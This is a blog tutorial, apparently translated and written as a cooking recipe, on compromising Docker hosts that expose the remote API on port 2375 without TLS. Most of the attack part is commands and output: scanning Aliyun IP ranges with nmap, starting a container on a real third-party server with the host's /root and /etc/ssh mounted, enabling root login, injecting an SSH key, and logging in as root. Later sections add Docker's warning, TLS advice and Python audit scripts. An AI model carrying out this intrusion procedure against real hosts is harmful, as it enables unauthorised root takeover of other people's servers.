Docker exposes port 2375, causing server attacks and solutions

Anyone who has worked with the Docker Remote API will know port 2375: it is the default port for remote control of Docker, and through it you can operate a remote docker daemon directly.

When the host $HOST starts its daemon with docker daemon -H=0.0.0.0:2375, you can operate the docker daemon of $HOST directly from another machine:

docker -H tcp://$HOST:2375 ps

Now to the "intrusion": how can the host machine be compromised through this port?

It comes down to three points:
1. Docker does not isolate the user namespace by default, so the root user inside a container is the root user of the host. Once a host directory is mounted into the container, that file system can be modified at will from inside the container, as host root.
2. The docker service runs with high privileges (equivalent to root), and an ordinary user in the docker group can run commands such as docker run without any further verification.
3. If SSL (TLS) verification is not enabled on the exposed docker remote API port, any machine that can reach the Docker host can operate its docker daemon freely (docker run, docker ps, docker rm and so on all work).

Put these three points together and we have all the conditions needed to take over a Docker host.

This may sound a bit far-fetched, so let's take a fresh example:

(Please allow me to go through the process with a dish I recently learned╮( ̄▽ ̄)╭ )

Secret Braised Pork (Docker Version)

Materials: whole slabs of "pork belly" IP ranges, the fatter the better (the more novice users, the better)

Ingredients: nmap, docker

Step 1: Scan port 2375

How to scan? I chose nmap, a simple, easy-to-use tool that every hacker keeps handy.

Where to scan? The target I chose was Aliyun's IP ranges, which a Baidu search turned up:


I don't produce IPs, I'm just a porter for Baidu. Don't ask me where these IPs come from, I want to know too~ >.<

Save the IP list in a file, such as aliyun.list.

Start scanning:

cat aliyun.list | awk '{print $1}' | xargs -n 1 -I {} nmap -sT -p2375 {} --open
# Briefly, what the command does:
# awk keeps only the first column (the IP ranges)
# xargs passes the ranges to nmap one at a time; -I {} substitutes {} with each argument
# ...
# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST
# Nmap scan report for 42.96.MOSAIC.MOSAIC
# Host is up (0.070s latency).
# PORT     STATE SERVICE
# 2375/tcp open  docker
# ...

In less than two minutes the first piece of "pork belly", 42.96.MOSAIC.MOSAIC (address censored), has been picked out. Come on~

Step 2: Test direct control over 2375

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps
 
# CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS  
# 73aa690e7c92 imdjh/owncloud-with-ocdownloader "/entrypoint.sh" 9 days ago Up 3 days 0.0.0.0:9009->80
# f57c56af0e29 rethinkdb:2.3.2 "rethinkdb --bind all" 9 days ago Up 3 days 8080/tcp, 28015/
# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 "/bin/sh -c /usr/bin/" 10 days ago Up 3 days 0.0.0.0:500->500
# af7338a5426d nginx:1.9-alpine "nginx -g 'daemon off" 3 weeks ago Up 3 days 443/tcp, 0.0.0.0
# ...

The owner of this server is really cooperative (⊙ο⊙). docker ps returns its output directly, which means port 2375 on this host has no SSL verification, and the conditions for intrusion are basically met.

Wash and cut the "pork belly" and get it ready for the pot~

Step 3: Remotely start your own container

What can you do once you control Docker? Once you have it, the rest is easy~

# images: list the existing local images
docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images
# ...
# swarm               latest   47dc182ea74b   4 weeks ago   19.32 MB
# jwilder/nginx-proxy latest   203b20631e41   4 weeks ago   255.6 MB
# ubuntu              latest   c5f1cf30c96b   4 weeks ago   120.8 MB
# shipyard/shipyard   latest   ba426f0944bc   5 weeks ago   58.92 MB
# ...

Some output is omitted. There are quite a lot of images. Let's choose Ubuntu.

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

At this step, anyone with some knowledge of ssh should see where this is going.
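For the operator of such a host, the telltale sign of this step is a container created with host directories bind-mounted into it. The following check is an added example, not code from the original post: it walks docker inspect output and flags bind mounts of sensitive host paths (and privileged containers); the inspect JSON is a constructed sample mirroring the run command above, and the list of sensitive prefixes is an assumption you should adapt to your hosts.

```python
import json

# Host paths whose bind mount hands a root-in-container process root-level write
# access to the host (no user-namespace remapping, as the post's point 1 notes).
SENSITIVE_PREFIXES = ("/root", "/etc", "/var/log", "/var/run/docker.sock",
                      "/home", "/boot", "/proc", "/sys")

def is_sensitive_host_path(path):
    """True for the host root itself or any path at or under a sensitive prefix."""
    p = path.rstrip("/") or "/"
    return p == "/" or any(p == s or p.startswith(s + "/") for s in SENSITIVE_PREFIXES)

def risky_mounts(inspect_output):
    """Walk `docker inspect` output (a JSON list) and return one
    (container_id, host_path, container_path, mode) tuple per risky bind mount;
    a privileged container is reported with host_path '*'."""
    findings = []
    for c in json.loads(inspect_output):
        cid = c.get("Id", "")[:12]
        if c.get("HostConfig", {}).get("Privileged"):
            findings.append((cid, "*", "*", "privileged"))
        for m in c.get("Mounts", []):
            if m.get("Type") == "bind" and is_sensitive_host_path(m.get("Source", "")):
                mode = "rw" if m.get("RW", True) else "ro"
                findings.append((cid, m["Source"], m.get("Destination"), mode))
    return findings

# Constructed sample: the container from step 3 of the post next to a benign one.
SAMPLE_INSPECT = json.dumps([
    {"Id": "0" * 64, "Name": "/hungry_pork",
     "HostConfig": {"Privileged": False},
     "Mounts": [
         {"Type": "bind", "Source": "/root", "Destination": "/tmp/root", "RW": True},
         {"Type": "bind", "Source": "/etc/ssh", "Destination": "/tmp/ssh_etc", "RW": True},
         {"Type": "bind", "Source": "/var/log", "Destination": "/tmp/log", "RW": True}]},
    {"Id": "1" * 64, "Name": "/web",
     "HostConfig": {"Privileged": False},
     "Mounts": [{"Type": "bind", "Source": "/srv/www",
                 "Destination": "/usr/share/nginx/html", "RW": False}]},
])

if __name__ == "__main__":
    for cid, src, dst, mode in risky_mounts(SAMPLE_INSPECT):
        print(f"container {cid}: host {src} -> {dst} ({mode})")
```

Run it against real hosts with `docker inspect $(docker ps -q)` as the input; a daemon that also logs container creation (the Docker events stream) lets you alert on such mounts as they happen.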

Step 4: ssh pub key injection

In the container you just started, first look at the PermitRootLogin field in /tmp/ssh_etc/sshd_config (that is, the host's /etc/ssh/sshd_config). If it is no, change it to yes so that root is allowed to log in via ssh.

Then generate a new key pair on your own machine (even if you already have an ssh key, generate a fresh one; do not use the ssh key you use every day):

# Generate a key pair with ssh-keygen
ssh-keygen -t rsa -C "[email protected]"
# At the prompt "Enter file in which to save the key", choose a path such as /tmp/id_rsa so you do not overwrite your own key
# Just press Enter for the other prompts

Next, inject the public key: back in the container started above, run

# Replace the ssh-rsa AAA.... line with the contents of the /tmp/id_rsa.pub you just generated on your machine
cat >> /tmp/root/.ssh/authorized_keys <<EOF
ssh-rsa AAA....
EOF

# If the /tmp/root/.ssh directory does not exist, create it first

Add star anise, bay leaves, light soy sauce, dark soy sauce and vinegar, cook over medium heat, and prepare to serve.

Step 5: Login to the server

# Log in with ssh -i, specifying the key
ssh -i /tmp/id_rsa [email protected]

# Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)
#
# * Documentation: https://help.ubuntu.com/
#
# Welcome to aliyun Elastic Compute Service!
#
# Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC
# manpath: can't set the locale; make sure $LC_* and $LANG are correct
# root@iZ28p9b7e***:~# 
# ...

Cook over high heat until the sauce thickens, then remove from heat!

Solemn Declaration

The above tutorial is for communication and learning purposes only. After this tutorial was completed, the injected id_rsa.pub on the 42.96.MOSAIC.MOSAIC server was actively removed, and a message was left on the server to inform its owner.

If you happen to discover an open port 2375, I hope you will stop there: do not use it for other purposes or go looking for further intrusion vulnerabilities, and keep it to communication and learning with everyone.

Is 2375 a docker vulnerability?

No! Exposing 2375 directly to the public Internet is purely a matter of user habit or laziness. 2375 is convenient for testing in a relatively secure internal network and is not suitable for a production environment.

The very first document on the official Docker website, Quick Start, contains this warning:

Warning: Changing the default docker daemon binding to a TCP port or
Unix docker user group will increase your security risks by allowing
non-root users to gain root access on the host. Make sure you control
access to docker. If you are binding to a TCP port, anyone with
access to that port has full Docker access; so it is not advisable
on an open network.

In short: if the daemon is exposed directly on a TCP port, a non-root user may be able to obtain root privileges on the host machine. That is exactly why the server above was compromised.

How to prevent it

So the question is: what should you do if you want to use the Remote API but do not want to risk being hacked?

The official Docker documentation describes how to use the Remote API with CA-based (TLS certificate) authentication.

For details, please refer to: Protect the Docker daemon socket

(I will write another post once I understand it properly; for now I will just link it here OO)

The configuration process is relatively simple. Here is a picture showing the effect after configuring SSL:
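As an added example that is not part of the original post, here is a small audit you can run on a Docker host to check for the exact conditions the post exploited: a TCP listener for the API without tlsverify, a bind on every interface, and no user-namespace remapping. The weak command line and the hardened daemon.json below are constructed samples; the certificate paths are placeholders for files produced per Docker's "Protect the Docker daemon socket" guide.

```python
import json
import shlex

def audit_dockerd(daemon_json, cmdline):
    """Audit a dockerd configuration for the exposure described in the post.
    daemon_json: text of /etc/docker/daemon.json ("" if absent); cmdline: the running
    daemon's command line (e.g. `ps -o args= -C dockerd`). Returns a list of findings."""
    cfg = json.loads(daemon_json) if daemon_json.strip() else {}
    argv = shlex.split(cmdline)
    hosts = list(cfg.get("hosts", []))
    tlsverify = bool(cfg.get("tlsverify", False))
    userns = cfg.get("userns-remap", "")
    i = 0
    while i < len(argv):  # dockerd flags may be written --flag=value or --flag value
        flag, val = (argv[i].split("=", 1) + [None])[:2]
        if flag in ("-H", "--host", "--userns-remap") and val is None:
            i += 1
            val = argv[i]
        if flag in ("-H", "--host"):
            hosts.append(val)
        elif flag == "--tlsverify":
            tlsverify = val in (None, "true")
        elif flag == "--userns-remap":
            userns = val
        i += 1
    findings = []
    for h in hosts:
        # A bare host:port (as in the post's -H=0.0.0.0:2375) is a TCP listener too.
        scheme, addr = h.split("://", 1) if "://" in h else ("tcp", h)
        if scheme != "tcp":
            continue
        if not tlsverify:
            findings.append(f"{h}: TCP API without tlsverify; anyone who can reach it has root-equivalent control")
        if addr.startswith(("0.0.0.0", "[::]")):
            findings.append(f"{h}: bound on every interface; use a management address or firewall the port")
    if not userns:
        findings.append("userns-remap not set: root in a container is root on the host for bind-mounted paths")
    return findings

# Constructed samples: the post's exposed daemon and a hardened equivalent
# (certificate paths are placeholders from the "Protect the Docker daemon socket" guide).
WEAK_CMDLINE = "dockerd -H=0.0.0.0:2375 -H unix:///var/run/docker.sock"
HARDENED_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,                          # only clients with a CA-signed cert are accepted
    "tlscacert": "/etc/docker/ca.pem", "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
    "userns-remap": "default",                  # container root maps to an unprivileged host uid
})
```

On systemd-managed hosts, setting "hosts" in daemon.json conflicts with the -H flag in the unit's ExecStart, so configure the listener in one place only.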
